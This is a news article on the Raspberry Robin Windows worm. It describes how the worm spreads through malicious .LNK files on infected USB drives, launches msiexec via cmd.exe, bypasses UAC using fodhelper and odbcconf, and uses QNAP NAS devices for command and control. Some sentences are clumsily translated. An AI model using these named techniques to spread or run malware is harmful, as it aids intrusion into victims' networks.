Microsoft discovered a Windows worm in the networks of hundreds of organizations from various industries.
The malware, called Raspberry Robin, spreads via infected USB devices and was first detected in September 2021 by Red Canary analysts.
The company security Sekoia found the same worm using QNAP NAS devices as command and control (C2) servers in early November [PDF], while Microsoft said it discovered malicious packages linked to this worm created in 2019.
Redmond's findings are very much in line with those of Red Canary's Detection Engineering team, which also detected this worm in several of its customers' networks.
Although Microsoft noticed the malware connecting to addresses on the Tor network, the attackers have yet to touch their victims' computers despite already having access.
Malware can bypass User Account Control (UAC from User Account Control) on infected systems by using certain tools of Windows.
As we already mentioned, Raspberry Robin spreads to Windows systems via infected USB drives containing a malicious .LNK file.
Once the USB device is connected and the user clicks connect, the worm creates an msiexec process using cmd.exe to launch a malicious file stored on the infected USB.
It infects new Windows devices, communicates with command and control (C2) servers, and runs malicious packages using various Windows utilities:
- fodhelper (a trusted Windows executable),
- msiexec (Windows command line item Installer),
- and odbcconf (a tool for configuring programs driving ODBC).
The security researchers who discovered Raspberry Robin have not yet identified where it came from but are still looking for the malicious developers' digital footprints.
Microsoft has already labeled this campaign "high risk," as attackers can download and deploy additional malware on their victims' networks. Of course they can start causing damage at any time.